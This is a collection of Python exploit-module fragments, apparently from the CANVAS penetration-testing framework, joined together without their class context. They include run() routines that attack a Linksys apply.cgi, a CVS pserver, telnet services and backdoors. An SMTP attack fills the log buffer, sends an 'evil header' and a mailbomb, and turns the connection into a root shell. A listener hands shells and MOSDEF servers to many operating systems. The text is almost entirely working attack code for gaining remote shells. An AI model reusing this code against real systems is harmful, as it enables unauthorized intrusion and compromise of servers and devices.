def dorun(self):
linksysapplycgiExploit.__init__(self, self.host, self.port)
self.sock = self.attack()
if not self.sock:
self.log("exploitation failed")
return 0
self.setInfo("%s %s:%d successfully exploited!" %
(NAME, self.host, self.port))
self.t = Telnet()
self.t.sock = self.sock
self.log("restarting httpd...")
self.t.write("/usr/sbin/httpd;/sbin/check_ps >/dev/null 2>&1;\n")
if self.cmdline:
self.proxy()
return
try:
shell = shelllistener(shellfromtelnet(self.t),
logfunction=self.logfunction,
simpleShell=1)
except:
self.log(
"Could not make a shell listener - connection was closed. Exploit most likely failed."
)
self.setProgress(-1)
return 0
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
return node
def run(self):
self.host = self.target.interface
self.port = self.argsDict["port"]
if self.version == self.LINUX:
CVSpserverdLinux.__init__(self)
shell = self.dorun()
# cmdline mode (just for this exploit .. not generic :/)
if hasattr(self, 'cmdline') and self.cmdline:
return shell
# return failure
elif shell in [0, 1, None]:
return shell
# init node
else:
# return unix shell node for gui
shell.write("/bin/sh -i\n")
import unixShellNode
from shelllistener import shelllistener
from shelllistener import shellfromtelnet
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shelllistener(shellfromtelnet(shell))
return node
def convertToCanvas(self, sock):
self.log('Starting UnixShellNode')
tn = Telnet()
tn.sock = sock
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict['passednodes'][0]
node.shell = shelllistener(shellfromtelnet(tn), simpleShell=1)
return node
def run(self):
self.getArgs()
#thread off to listen for the post
listenDaemon = threading.Thread(target=self.listen3010)
listenDaemon.setDaemon(True)
listenDaemon.start()
time.sleep(2)
#thread off to make the post
sendPost = threading.Thread(target=self.makePost)
sendPost.start()
#self.makePost()
time.sleep(3)
#wait for the request to hit the listener
self.host = self.target.interface
self.port = 1337
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
logging.info("Attacking %s:%d (in progress)" % (self.host, self.port))
try:
s = self.gettcpsock()
s.connect((self.host, self.port))
except socket.error:
logging.info("Backdoor connection not successful")
self.setProgress(-1)
return 0
telnetshell = Telnet()
telnetshell.sock = s
self.setProgress(80)
try:
# Success, convert to unixShellNode through shellfromtelnet.
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.logfunction)
except:
logging.info(
"Could not make a shell listener - connection was closed. Exploit most likely failed"
)
import traceback
print '-' * 60
logging.traceback(file=sys.stdout)
print '-' * 60
self.setProgress(-1)
return 0
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
self.setInfo("%s attacking %s:%d (success!)" %
(NAME, self.host, self.port))
return node
def run(self):
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
try:
s = self.gettcpsock()
s.connect((self.host, self.port))
except socket.error:
self.log("backdoor connection not successful.")
self.setProgress(-1)
return 0
telnetshell = Telnet()
telnetshell.sock = s
self.setProgress(80)
try:
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.logfunction)
except:
self.log(
"Could not make a shell listener - connection was closed. Exploit most likely failed."
)
import traceback
print '-' * 60
traceback.print_exc(file=sys.stdout)
print '-' * 60
self.setProgress(-1)
return 0
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
#shell=shelllistener(shellfromtelnet(tn))
node.shell = shell
self.setInfo("%s attacking %s:%d (success!)" %
(NAME, self.host, self.port))
return node
def run(self):
"""
Actually exploit the target.
"""
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.username = self.argsDict.get("username", self.username)
self.setInfo("%s attacking %s:%d" % (NAME, self.host, self.port))
#first make socket connection to target
self.log("Connecting to %s:%d" % (self.host, self.port))
#self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s = self.gettcpsock()
try:
self.s.connect((self.host, int(self.port)))
except:
self.log("Could not connect!")
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return 0
self.IAC_neg()
self.do_exploit()
# need to add error checking
telnetshell = Telnet()
telnetshell.sock = self.s
try:
shell = shelllistener(shellfromtelnet(telnetshell))
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
except:
self.log("Connection closed during exploit - server is patched.")
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return None
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
#shell should always be valid here....
return node
self.log("Data: '%s'" % data)
self.setProgress(50)
if data.count(self.prompt) == 0 and data.count(self.cshprompt) == 0:
#we failed to log in
self.log("We failed to log in.")
self.setInfo("%s attacked %s:%d (failed)" %
(NAME, self.host, self.port))
return None
if data.count(self.cshprompt):
self.prompt = "% "
self.setProgress(75)
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
shell = shelllistener(shellfromtelnet(tn))
node.shell = shell
shell.node = node
self.setInfo("%s attacking %s:%d (succeeded!)" %
(NAME, self.host, self.port))
return node
#this stuff happens.
if __name__ == '__main__':
print "Running CANVAS %s Exploit v %s" % (DESCRIPTION, VERSION)
app = theexploit()
ret = standard_callback_commandline(app)
if ret not in [0, 1, None]:
ret.interact()
def run(self):
self.getArgs()
self.host = self.target.interface
self.setInfo("%s attacking %s:%d" % (NAME, self.host, self.port))
try:
s = smtplib.SMTP(self.host, self.port, timeout=10)
except:
self.log("Could not connect to smtp")
return False
s.sock.set_timeout(20)
try:
if self.ehlo_name == "":
s.ehlo()
else:
s.ehlo(self.ehlo_name)
except:
self.log("EHLO failed")
return False
# Parse out the client hostname and ip address from the EHLO response
self.log("EHLO reply: %s" % s.ehlo_resp)
response = re.split(" |\t|\r\n|\n", s.ehlo_resp)
self.target_name = response[0]
self.client_name, self.client_ip = response[2:4]
if self.ehlo_name == "":
self.ehlo_name = s.local_hostname
# Eliminate the encapsulating [] from the target ip address
self.client_ip = self.client_ip[1:-1]
self.log("Parsing EHLO response.")
self.log("Target name = " + self.target_name)
self.log("Client name = " + self.client_name)
self.log("Client IP = " + self.client_ip)
# Send MAIL FROM using client name.
if self.mail_from == "":
self.mail_from = "canvas@%s" % self.client_name
try:
n, r = s.docmd("MAIL FROM: %s" % self.mail_from)
except:
self.log("SMTP server disconnected")
return False
if n != 250:
self.log("MAIL FROM command failed: %d %s" % (n, r))
return False
# Send RCPT TO using target name.
if self.rcpt_to == "":
self.rcpt_to = "postmaster@%s" % self.target_name
try:
n, r = s.docmd("RCPT TO: <%s>" % self.rcpt_to)
except:
self.log("SMTP server disconnected")
return False
if n != 250:
self.log("RCPT TO command failed: %d %s" % (n, r))
return False
# Send DATA command.
try:
n, r = s.docmd("DATA")
except:
self.log("SMTP server disconnected")
return False
if n != 354:
self.log("DATA command failed: %d %s" % (n, r))
return False
# Proceed to send out the headers
log_space = self.get_log_buffer_space()
self.log("Log buffer space: %u" % log_space)
# Fill the log buffer by sending headers. We reserve three bytes
# for the "%c " used for the next header, and the terminating 0
# reserved in string_format() itself.
self.log("Filling log buffer with %u bytes" % (log_space - 3))
try:
filled = self.fill_log_buffer(s.sock, log_space - 3)
except:
self.log("Filling log failed")
return False
self.log("Sent %u header bytes to accomplish this" % filled)
# Send over the attack string
self.log("Sending attack string")
try:
self.send_evil_header(s.sock)
except:
self.log("Sending evil header failed")
return False
# And finally send 50MiB of crap to go over the message size.
self.log("Sending larger message than allowed...")
try:
self.mailbomb(s.sock)
except:
self.log("Sending mailbomb failed")
return False
self.log("Done!")
# Send '.' command to terminate the mail. We expect this to
# result in a 552 error.
try:
n, r = s.docmd(".")
except:
self.log("SMTP server disconnected")
return False
if n != 552:
self.log("Sending message did not trigger 552: %d %s" % (n, r))
return False
# Trigger the ACL which string_expands() our evil header.
self.log("Trying to trigger bug")
try:
s.sock.send("MAIL FROM: <*****@*****.**>\r\n")
except:
self.log("Sending trigger failed")
return False
# See what the remote answered. This should drain either the
# SMTP return code, or the shell command line.
self.log("Verifying trigger")
try:
s.sock.recv(4096)
except:
self.log("Error reading trigger response. Daemon crashed?")
return False
# Verify if things worked. We send a string with backslashes in
# there, as the shell will eat them, while an MTA will not.
try:
s.sock.send("/bin/echo har\\har\\har\\har\r\n")
except:
self.log("Sending of verifier failed")
# See what the remote answered.
try:
response = s.sock.recv(4096)
except:
self.log("Error reading trigger response. Daemon crashed?")
return False
# harharharhar is not guaranteed to be seen in the response (for instance ubuntu 9.x with exim 4.6x)
# (maybe) better way to judge success is to try and execute a command and check reply
# if response.find("harharharhar") == -1 and response.find("access tty") == -1 and response.find("$") == -1:
# self.log("Exploit failed. Did not spawn a shell.")
# self.log("Response was: " + response)
# return False
# self.log("Success! Trigger response: " + response)
# Success, convert to unixShellNode through shellfromtelnet.
try:
node = unixShellNode.unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
tnshell = Telnet()
tnshell.sock = s.sock
shell = shelllistener(shellfromtelnet(tnshell))
ret = shell.runcommand('/bin/uname -a')
if not ret: raise Exception('No reason')
self.log('Runcommand output: %s' % ret)
except:
self.log('Exploit failed. Did not spawn a shell: %s' % response)
return False
self.log('Success! Trigger response: ' + response)
node.shell = shell
shell.node = node
self.setInfo("%s attacking %s:%d (succeeded!)" %
(NAME, self.host, self.port))
return node
def handleConnection(self, connection):
try:
connection.set_timeout(None)
except:
self.log("[!] likely an ipv6 socket, set_timeout not supported !")
server = None
if self.type == self.targets.index("LINUXEXECVE_INTEL"):
self.log("Connected: Running a Linux server...")
import linuxMosdefShellServer
#time.sleep(10)
newshell = unixShellNode()
pnode = localNode()
pnode.newNode(newshell)
server = linuxMosdefShellServer.execveshellserver(
connection, newshell)
#server.addInitString(self.initstring)
#server.addInitString("chrootbreak")
server.startup()
elif self.type == self.targets.index("LINUXMOSDEF_INTEL"):
self.log("Connected, Linux MOSDEF ...")
newshell = linuxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = MosdefShellServer('Linux', 'i386')(connection, newshell)
#shell=linuxMosdefShellServer.linuxshellserver(connection,newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index('OSXMOSDEF_INTEL'):
self.log('Connected, OSX MOSDEF INTEL ...')
newshell = osxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = MosdefShellServer('OSX', 'i386')(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("OSXMOSDEF_PPC"):
self.log("Connected, OSX MOSDEF PPC ...")
import osxMosdefShellServer
newshell = osxNode()
pnode = localNode()
pnode.newNode(newshell)
shell = osxMosdefShellServer.osxshellserver(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("WIN32MOSDEF_INTEL"):
self.log("Connected, running win32 MOSDEF server")
import win32MosdefShellServer
from win32Node import win32Node
newshell = win32Node()
pnode = localNode()
pnode.newNode(newshell)
shell = win32MosdefShellServer.win32shellserver(connection,
newshell,
logfunction=None)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("SOLARISMOSDEF_SPARC"):
self.log("Connected, Solaris MOSDEF ...")
import solarisMosdefShellServer
newshell = solarisNode()
pnode = localNode()
pnode.newNode(newshell)
shell = solarisMosdefShellServer.solarisshellserver(
connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("SOLARISMOSDEF_INTEL"):
self.log("Connected, Solaris x86 MOSDEF ...")
import solarisMosdefShellServer
newshell = solarisNode()
pnode = localNode()
pnode.newNode(newshell)
shell = solarisMosdefShellServer.solarisx86shellserver(
connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("BSDMOSDEF_INTEL"):
self.log("Connected, BSD MOSDEF")
import bsdMosdefShellserver
newshell = bsdNode()
pnode = localNode()
pnode.newNode(newshell)
shell = bsdMosdefShellserver.bsdshellserver(connection, newshell)
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("AIXMOSDEF_51_PPC"):
self.log("Connected, AIX MOSDEF")
newshell = aixNode()
pnode = localNode()
pnode.newNode(newshell)
aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC')
shell = aixMosdefShellServer(connection, newshell, version='5.1')
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("AIXMOSDEF_52_PPC"):
self.log("Connected, AIX MOSDEF")
newshell = aixNode()
pnode = localNode()
pnode.newNode(newshell)
aixMosdefShellServer = MosdefShellServer('AIX', 'PowerPC')
shell = aixMosdefShellServer(connection, newshell, version='5.2')
shell.argsDict = self.argsDict
newshell.startup()
server = shell
elif self.type == self.targets.index("PHPMULTI"):
newsocket = connection
self.log("Starting up a %s server" % type)
import phplistener
from ScriptShellServer import phpshellserver
node = ScriptNode()
node.parentnode = self.engine.getLocalNode()
shell = phpshellserver(newsocket, node)
shell.startup()
newshell = node
server = shell
elif self.type == self.targets.index("UNIXSHELL"):
newsocket = connection
self.log("Starting up Unix Shell")
pnode = localNode()
telnetshell = Telnet()
telnetshell.sock = newsocket
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.log)
newshell = unixShellNode()
newshell.shell = shell
shell.node = newshell
pnode.newNode(newshell)
server = shell
elif self.type == self.targets.index("JAVA"):
newsocket = connection
self.log("Starting up a %s server" % type)
from Nodes.JavaShellServer import javashellserver
from JavaNode import JavaNode
node = JavaNode()
node.parentnode = self.engine.getLocalNode()
shell = javashellserver(newsocket, node)
shell.startup()
newshell = node
server = shell
else:
print "Don't know what type I am!"
sys.exit(1)
if self.mode == "interactive":
print "Letting user interact with server"
if server:
server.interact()
else:
print "No server...exiting this shell..."
elif self.mode == "Run one command":
print "Running a command or set of commands"
if self.uploadfiles != []:
for f in self.uploadfiles:
print "Uploading %s" % f
# Why doesn't this use exploits/upload/upload.py then?
print server.upload(f)
print server.runcommand(self.command)
###insert your post-op stuff here!!!
###you might want:
###server.doexitthread(1)
###or
server.runexitprocess()
if server:
server.disconnect()
return
